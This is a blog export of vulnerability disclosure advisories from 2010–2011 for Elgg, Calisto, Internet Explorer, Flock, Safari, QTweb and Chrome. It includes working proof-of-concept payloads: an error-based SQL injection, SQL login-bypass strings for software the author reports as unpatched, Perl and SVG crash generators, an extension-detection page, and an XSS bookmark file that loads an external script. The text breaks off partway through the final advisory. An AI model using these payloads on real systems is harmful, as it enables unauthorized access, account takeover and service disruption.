Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-81688359255955351022011-08-15T12:28:00.001-07:002011-08-15T12:30:42.809-07:00Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection##################################################<br />
Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection<br />
Vendor URL: http://www.elgg.org/<br />
Advisore: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
###################<br />
Description By vendor<br />
###################<br />
<br />
Elgg is an award-winning social networking engine, delivering<br />
the building blocks that enable businesses, schools, universities<br />
and associations to create their own fully-featured social networks<br />
and applications. Organizations with networks powered by Elgg<br />
include: Australian Government, British Government, Federal Canadian<br />
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,<br />
Johns Hopkins University and more (http://elgg.org/powering.php)<br />
<br />
<br />
######################<br />
Vulnerability Description<br />
######################<br />
<br />
Elgg contains a flaw that may allow an attacker to carry out an<br />
SQL injection attack. The issue is due to the script not properly<br />
sanitizing user-supplied input to 'container_guid' and 'owner_guid'<br />
variables upon submision to 'mod/search/pages/search/index.php' <br />
This may allow an attacker to inject or manipulate SQL queries<br />
in the backend database.<br />
<br />
################<br />
Versions afected<br />
################<br />
<br />
Elgg 1.8 beta2 vulnerable <br />
Elgg 1.7.10 and prior versions vulnerables<br />
Elgg 1.7.11 not vulnerable<br />
<br />
#################<br />
Tecnical details<br />
#################<br />
<br />
Injection type is Integer and it only can be exploit via<br />
Mysql error based injection method, it works with<br />
'magic_quotes_gpc' set to 'on' or 'off'<br />
<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<br />
If you know what is error based injection... you know how to use it ;)<br />
<br />
URL => http://localhost/elgg/search/?q=someword&search_type=tags&container_guid=7826'<br />
<br />
Injections:<br />
<br />
and(select 1 from(select count(*),concat((select (select %column_name%) from<br />
`information_schema`.tables limit 0,1),floor(rand(0)*2))x from<br />
`information_schema`.tables<br />
group by x)a) and 1=1<br />
<br />
Count(table_name) of information_schema.tables where<br />
table_schema=0x74657374 is 75<br />
<br />
Count(column_name) of information_schema.columns where<br />
table_schema=0x74657374 and table_name=0x62616E6C697374 is 4<br />
<br />
################<br />
Solution<br />
###############<br />
<br />
The vendor has release a updated version to solve this <br />
issue and others see changelog and update your Elgg <br />
instalation to 1.7.11<br />
<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered :July 30, 2011<br />
Vendor Notify:July 30, 2011<br />
Vendor response:July 30, 2011<br />
Vendor Patch: August 15, 2011<br />
Public Disclosure: August 15, 2011<br />
<br />
########################## €nd ########################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente.... <div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-11612733854055088962011-08-11T14:09:00.004-07:002011-08-14T04:04:33.809-07:00Calisto light, light plus and full, Sql Injection And user or Admin bypass##################################################<br />
Calisto light, light plus and full, Sql Injection And user or Admin bypass<br />
Vendor URL: http://www.calistosoft.com.ar/<br />
Advisore: http://lostmon.blogspot.com/2011/08/calisto-light-light-plus-and-full-sql.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
<br />
##########################<br />
Vulnerability Description<br />
##########################<br />
<br />
Calisto Light, Light Plus and Full contains a flaw that may <br />
allow an attacker to carry out an SQL injection attack. The<br />
issue is due to the script not properly sanitizing user-supplied<br />
input to 'usuario' form field and "txtEmail' param upon submision<br />
to 'login.aspx' and '/admin/loginAdmin.aspx' This may allow an <br />
attacker to inject or manipulate SQL queries in the backend database.<br />
#################<br />
UPDATE 14/08/2011<br />
#################<br />
<br />
Detalle.aspx, Oferta.aspx, Categoria.aspx, contacto.aspx, <br />
marca.aspx, novedades.aspx, empresa.aspx FAQ.aspx and Registracion.aspx<br />
are afected by this flaw too.<br />
<br />
################<br />
Versions afected<br />
################<br />
<br />
Calisto Light<br />
Calisto Light plus<br />
Calisto Full<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<br />
this issue can be used to bypass admin validation or user validation <br />
<br />
1- If an attacker writes in 'Usuario' box:<br />
<br />
someword'or'1'='1'<br />
and click in login button. wen the aplication post to 'login.aspx' <br />
it shows a nice SQL warning but if write:<br />
<br />
someword'or'1'='1'--<br />
<br />
it bypass validation. if anyones know a user email, then he can <br />
log as this user :) <br />
<br />
2- If an attacker writes in 'usuario' box from admin section:<br />
<br />
Admin'or'1'='1'--<br />
<br />
And click in login button wen the aplication post to<br />
'/admin/loginAdmin.aspx' it bypass Admin validation. :)<br />
<br />
<br />
################<br />
Solution<br />
###############<br />
<br />
No solution was available at this time.<br />
I have send four emails to calistosoft via his webform<br />
and info and support mails to get initial contact but <br />
they haven't respond :(<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered : 30-07-2011<br />
Vendor Notify: 7-08-2011<br />
Vendor response: no response.<br />
Workarround patch: no patch<br />
Vendor Patch: no patch<br />
Public Disclosure: 11-08-2011<br />
<br />
########################## €nd ########################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente.... <div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-77284822533405503852011-08-09T11:55:00.003-07:002011-08-09T12:30:19.272-07:00Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability#############################################<br />
Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability<br />
Vendor URL: http://www.microsoft.com<br />
Advisore: http://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.html<br />
Coordinate Dislcosure: YES exploit available: Private<br />
CVE-2011-1257 and MS011-57<br />
#############################################<br />
<br />
Microsoft Internet Explorer 6, 7 and 8 is prone vulnerable to a<br />
Remote code execution due a race condition in window.open<br />
javascript metod<br />
<br />
A Remote attacker can compose a web page with malicious code<br />
and wen a victim visit this malformed web doc, attacker can<br />
exploit this situation.<br />
<br />
<br />
######################<br />
Solution<br />
######################<br />
<br />
Microsoft has issue a bulletin class with tecnical detalis about this issue<br />
with this identifier [MS011-57]<br />
<br />
you can found more detailed at this link:<br />
http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx<br />
<br />
Also microsoft has issue a patch to solve this vulnerability<br />
see http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx<br />
for update your system.<br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered : January 13, 2011<br />
Vendor Notify: January 19, 2011<br />
Vendor Response: January 19, 2011<br />
Vendor Patch: August 9, 2011<br />
Public Disclosure: August 9, 2011<br />
<br />
################# €nd #########################<br />
<br />
Thnx to Michal Zalewski for his extraordinary mind<br />
and knowledge, people like him should have a virtual<br />
statue for the rest of the times<br />
<br />
Thnx To Jack, Gerardo, Nate and all MSRC<br />
for his support in this issue.<br />
<br />
Thnx To Microsoft Vulnerability Research (MSVR)<br />
for interesting in this issue and for coordinate<br />
Disclosure in other browsers afected.<br />
<br />
Thnx to All who Belive in Me include you Estrella :**<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-50290692770803760972011-03-11T14:35:00.001-08:002011-03-11T14:35:34.985-08:00Multiple vulnerabilities in Flock Browser 3.0.0.3989#########################################<br />
Multiple vulnerabilities in Flock Browser 3.0.0.3989<br />
Vendor URL: http://beta.flock.com/<br />
Vendor Advisores: http://www.flock.com/security/ <br />
Advisore:http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html<br />
Vendor notify:YES exploits availables:YES<br />
######################################### <br />
<br />
Some stuff that i don't have published before , because i don't have time , i'm studing and i need time to read books and study.<br />
<br />
Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends. This browser version (3.0.0.3989) is based in a old chromium project (5.0.375.75) and has multiple bugs imported from chrome and his owns bugs :) <br />
I have contributed in secure Flock browser, i have tested version with google chrome base. <br />
I have do a list with all issues that i found and Flock Team has release some advisores about it time after.<br />
<br />
###############<br />
TODO LIST / Bugs<br />
###############<br />
<ol><li> Inspector window attributes script injection chrome bug 31590</li>
<li> XSS in search engine in chrome://history/ chrome bug 13760( not exploitable from remote attackers ) (chrome://history/#q="><iframe src=javascript:alert(1)>&p=0) </li>
<li> XSS in search box in favorites page ( chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title)(not explotable from remote attackers) </li>
<li> XSS in search engine extension when paste in url (chrome-extension://flock_people/search.html)( persistent xss)(not exploiable from remote attackers) </li>
<li> XSS in social extension when try to login in facebook or twiter or youtube (not exploitable from remote attackers) </li>
<li> XSS in rss vienwer in search box chrome-extension://flock_people/feed_viewer.html?http://path_to_rss ( not exploitable from remote attackers) </li>
<li> XSS in rss viewner when render xml from remote host if the entry has html it is executed when view the news across flock rss viewner(exploitable via remote sites) (see for example my feed => chrome-extension://flock_people/feed_viewer.html?http://lostmon.blogspot.com/atom.xml) and them if you type in search box for example " or < it executes again the xss stored in xml file :) </li>
<li>window.open() Method Javascript Same-Origin Policy Violation chrome bug 30660 </li>
<li>url with a leading NULL byte can bypass cross origin protection Chrome bug 37383</li>
</ol><br />
<br />
###########################<br />
Advisores from Flock developers<br />
###########################<br />
<b>FLOCK-SA-2010-04</b><br />
<br />
Title: window.open() Method Javascript Same-Origin Policy Violation (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4094<br />
CVEs (cve.mitre.org): CVE-2010-0661<br />
Details:<br />
WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.<br />
<br />
Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).<br />
References: https://bugs.webkit.org/show_bug.cgi?id=32647<br />
http://code.google.com/p/chromium/issues/detail?id=30660<br />
<br />
<b>FLOCK-SA-2010-03</b><br />
<br />
Title: javascript: url with a leading NULL byte can bypass cross origin protection (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4112<br />
CVEs (cve.mitre.org): CVE-2010-1236<br />
<br />
Details: <br />
A javascript: url with a leading NULL byte can bypass cross origin protection,<br />
which has unspecified impact and remote attack vectors.<br />
<br />
Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).<br />
References: https://bugs.webkit.org/show_bug.cgi?id=35948<br />
http://code.google.com/p/chromium/issues/detail?id=37383<br />
<br />
<b>FLOCK-SA-2010-02</b><br />
<br />
Title: A malicious RSS feed can bypass cross origin protection (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4114<br />
CVEs (cve.mitre.org): CVE-2010-3262<br />
<br />
Details: <br />
A malicious RSS feed containg HTML when viewed can bypass cross-origin protection,<br />
which has unspecified impact and remote attack vectors.<br />
Credit to Lostmon Lords.<br />
<br />
<b>FLOCK-SA-2010-01</b><br />
<br />
Title: A malformed favourite can bypass cross origin protection (XSS)<br />
Impact: Moderate<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4094<br />
CVEs (cve.mitre.org): CVE-2010-3202<br />
Details: <br />
A malformed favourite imported from an HTML file, imported from another browser,<br />
or manually created can bypass cross-origin protection, which has unspecified impact<br />
and attack vectors.<br />
Credit to Lostmon Lords.<br />
References: http://www.securityfocus.com/archive/1/513214<br />
################################################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-67193764364557554622010-12-08T12:53:00.002-08:002010-12-09T13:27:17.182-08:00QTweb browser for windows 3.7(Build 063) CSS Denial of Service#########################################################<br />
QTweb browser for windows 3.7(Build 063) CSS Denial of Service<br />
Vendor URL: http://www.qtweb.net/<br />
Advisore:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html<br />
Vendor notify: NO exploit available: YES<br />
##########################################################<br />
<br />
QTweb browser for windows is prone vulnerable to a denial of service<br />
condition. An attacker can exploit this issue to cause the <br />
affected browser to crash, effectively denying service to <br />
legitimate users.<br />
<br />
The following are vulnerable:<br />
<br />
QTweb for windows 3.7(Build 063)<br />
<br />
<br />
###########<br />
Sample PoC<br />
###########<br />
<br />
Generate the Crash file and open it with QTweb browser,it hangs and arround one minut it crash with a anormal program termination.<br />
<br />
#########################################################################<br />
# Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC <br />
# Developer: http://www.Apple.com <br />
# Tested: Windows 7 Ultimate 32-bit <br />
#########################################################################<br />
# <br />
#!/usr/bin/perl <br />
my $file= "Crash_QTweb.html"; <br />
my $junk= "A/" x 20000016; <br />
open($FILE,">$file"); <br />
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>"; <br />
print "\nCrash_QTweb.html File Created successfully\n"; <br />
close($FILE);<br />
<br />
############################# EOF ############################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-74143214580006365292010-12-08T12:44:00.001-08:002010-12-08T12:45:36.734-08:00Safari for windows 5.0.2(7533.18.5) CSS Denial of Service#########################################################<br />
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service<br />
Vendor URL:http://www.Apple.com<br />
Advisore:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html<br />
Vendor notify: NO exploit available: YES<br />
##########################################################<br />
<br />
Safari for windows is prone vulnerable to a denial of service<br />
condition. An attacker can exploit this issue to cause the <br />
affected browser to crash, effectively denying service to <br />
legitimate users.<br />
<br />
The following are vulnerable:<br />
<br />
safari for windows 5.0.2(7533.18.5)<br />
<br />
<br />
###########<br />
Sample PoC<br />
###########<br />
<br />
Generate the Crash file and open it with safari,it hangs and arround one minut it crash<br />
with a anormal program termination.<br />
<br />
#########################################################################<br />
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC <br />
# Developer: http://www.Apple.com <br />
# Tested: Windows 7 Ultimate 32-bit <br />
#########################################################################<br />
# <br />
#!/usr/bin/perl <br />
my $file= "Crash_safari.html"; <br />
my $junk= "A/" x 20000000; <br />
open($FILE,">$file"); <br />
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>"; <br />
print "\nCrash_safari.html File Created successfully\n"; <br />
close($FILE);<br />
<br />
############################# EOF ############################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-24065016144985177962010-09-07T05:20:00.003-07:002010-09-07T05:23:30.798-07:00Google Chrome Instaled extensions arbitrary detection######################################################<br />
Google Chrome Instaled extensions arbitrary detection<br />
Vendor url: http://www.google.com<br />
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html<br />
Vendor notify:YES vendor confirmed.YES exploit:YES<br />
######################################################<br />
<br />
Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html<br />
<br />
#########<br />
Abstract<br />
#########<br />
<br />
How safe is use extensions ?<br />
a attacker can access via iframe to resource extensions ( at this moment i <br />
don´t have found a way to altered information from extensions).<br />
<br />
like <br />
>iframe<br />
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<<br />
for example...<br />
<br />
a remote user can modify this web doc and call it with meta tag "base" <br />
in a malformed doc...<br />
<br />
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/"><br />
so i thnik that chrome-extension need sanitizacion to don´t access internal<br />
resources from external web pages..( file:/// and other protocols handlers<br />
are safe to use and don´t give access to internal resources from external<br />
web docs...)<br />
<br />
So chrome-extension protocol handler can be used to get extensions instaled<br />
on client browser...and them if any extension is vulnerable to something<br />
this information can be used for exploit this extension...<br />
<br />
In incognito mode Extensions can be detectable too<br />
<br />
###########################<br />
A sample PoC of detection <br />
###########################<br />
<br />
<html><br />
<head><br />
<title>Chrome extensions detector PoC By Lostmon</title><br />
<body><br />
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"<br />
onLoad="document.write('<br /><b>you have instaled Gmail checker<br />
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"<br />
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img<br />
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"<br />
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"<br />
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img<br />
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"<br />
onLoad="document.write('<br /><b>you have instaled Webpage<br />
Screenshot</b>');" onError="document.write('<br /><b>File not<br />
found</b>');"></p><br />
<p><img<br />
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"<br />
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img<br />
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"<br />
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
</body><br />
</html><br />
<br />
####################EOF##########################<br />
<br />
##############<br />
Timeline<br />
##############<br />
<br />
Discovered:27 may 2010<br />
Vendor notify:01 jun 2010<br />
Vendor patch:02 sep 2010<br />
disclosure: 07 sep 2010<br />
<br />
#######################€ND ########################<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-75045086477326436952010-08-30T08:55:00.003-07:002010-08-30T09:00:29.590-07:00Safari for windows Invalid SGV text style Webkit.dll DoS###################################################<br />
Safari for windows Invalid SGV text style Webkit.dll DoS<br />
Vendor URL:www.apple.com<br />
Advisore:<a href="http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html">http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html</a><br />
Vendor notify :Yes exploit available :YES<br />
###################################################<br />
<br />
Safari browser for windows is prone vulnerable to a Denial of<br />
service condition , this issue affects webkit.dll and cause a<br />
crash when Safari try to render a SGV image with a very long<br />
font size text style.<br />
<br />
<br />
<br />
############<br />
versions<br />
############<br />
<br />
Safari for windows 5.0.1 (7533.17.8)<br />
on windows 7 ultimate fully patched.<br />
<br />
<br />
Safari for windows windows 5.0.1 (7533.17.8)<br />
on windows xp home sp3 fully patched<br />
<br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered:19-08-2010<br />
vendor notofy:25-08-2010<br />
Vendor response:26-08-2010<br />
Disclosure: 30-09-2010<br />
<br />
####################<br />
Proof Of Concept<br />
####################<br />
<br />
Save This code as image.svg and open it with Safari,look<br />
i have add some "extra" pixels in font size text style.<br />
<br />
################ BOF image.svg ######################<br />
<br />
<?xml version="1.0"?><br />
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1"><br />
<defs><br />
<mask id="crash"><br />
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074 <br />
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074 <br />
51,121.538 129.666,119.935"<br />
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254) <br />
translate(-52.381 -37.9218)"<br />
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" /><br />
</mask><br />
</defs><br />
<br />
<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;"> <br />
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text><br />
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text><br />
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text><br />
</g><br />
<br />
</svg><br />
<br />
###############EOF####################<br />
<br />
################# €nd ###############<br />
<br />
<span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Thnx To Climbo for his patience and support.</span><br />
<br />
<span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Atentamente:</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br />
</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Lostmon (lostmon@gmail.com)</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br />
</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Web-Blog: http://lostmon.blogspot.com/</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br />
</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Google group: http://groups.google.com/group/lostmon (new)</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br />
</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">--</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br />
</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">La curiosidad es lo que hace mover la mente....</span><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-62599487827233995992010-08-19T07:50:00.005-07:002010-08-19T08:00:13.276-07:00Flock Browser 3.0.0.3989 Malformed Bookmark XSS#########################################<br />
Flock Browser 3.0.0.3989 Malformed Bookmark XSS<br />
Vendor URL: http://beta.flock.com/<br />
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html<br />
Vendor notify:NO exploits availables:YES<br />
#########################################<br />
<br />
Flock is faster, simpler, and more friendly. Literally. <br />
It's the only sleek, modern web browser with the built-in <br />
ability to keep you up-to-date with your Facebook and Twitter <br />
friends.This browser version (3.0.0.3989) is based in a old<br />
chromium project<br />
<br />
<br />
Flock has a flaw that allows Cross-site scripting style attacks<br />
In bookmarks is has a Malformed bookmark title persistent xss<br />
when inport from other browsers a malformed bookmark or when add<br />
a new malformed bookmark or import a bookmark html file.<br />
<br />
###############################<br />
Example Of Bookmark html file<br />
###############################<br />
<br />
<!DOCTYPE NETSCAPE-Bookmark-file-1><br />
<!-- This is an automatically generated file.<br />
It will be read and overwritten.<br />
DO NOT EDIT! --><br />
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><br />
<TITLE>Bookmarks</TITLE><br />
<H1>Menú Marcadores</H1><br />
<DL><p><br />
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">&quot;&gt;&lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A><br />
</DL><p><br />
<br />
#####################EOF##################<br />
<br />
It is a persintent script insercion and when the user click in the menu for view<br />
favorites page or access directly to favorites url this make a "defacement" of this page and them the user can´t access to favorites :)<br />
( Url of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )<br />
<br />
################# €nd #######################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-33779296886840362742010-08-16T13:17:00.002-07:002010-08-16T13:21:18.618-07:00Google Chrome and Chrome frame Prompt DoS###############################################<br />
Google Chrome and Chrome frame Prompt DoS<br />
Vendor URL: http://www.google.com<br />
Advisore:http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html<br />
Advosore spanish:http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html<br />
Vendor notify: YES exploit available:YES<br />
###############################################<br />
<br />
This Bug was discoveres by me and i have tested it<br />
and investigate with Climbo From #ayuda-informaticos<br />
on irc-hispano channel.<br />
<br />
#########<br />
abstract <br />
#########<br />
<br />
Some times the web aplications need to Prompt some data to users,<br />
it can prompt via javascript code , or via html forms ...<br />
<br />
In the case of javascript prompts what´s happend if<br />
the data to prompt ( the question) is very long ?¿<br />
<br />
################<br />
<br />
Google chrome is prone vulnerable to a Denial of service<br />
condition via "alert prompts" wen the data expected is very long ...<br />
<br />
i don´t know if this can be turn in a remote code execution or <br />
memory corruption with some heap spray or similar but i think <br />
that this need to be analyze & patch <br />
<br />
<br />
###################<br />
Versions Tested<br />
###################<br />
<br />
In all cases chrome is the vector to do<br />
something in all systems :)<br />
<br />
<br />
######################<br />
MAC OS X leopard 10.5<br />
######################<br />
<br />
Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4<br />
V8 2.1.10.15<br />
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) <br />
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4<br />
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818<br />
<br />
In all cases OS X closes all Chrome Windows.( Chrome Crash)<br />
<br />
<br />
##############<br />
ubuntu 10.04<br />
##############<br />
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04<br />
WebKit 533.4 <br />
V8 2.1.10.14<br />
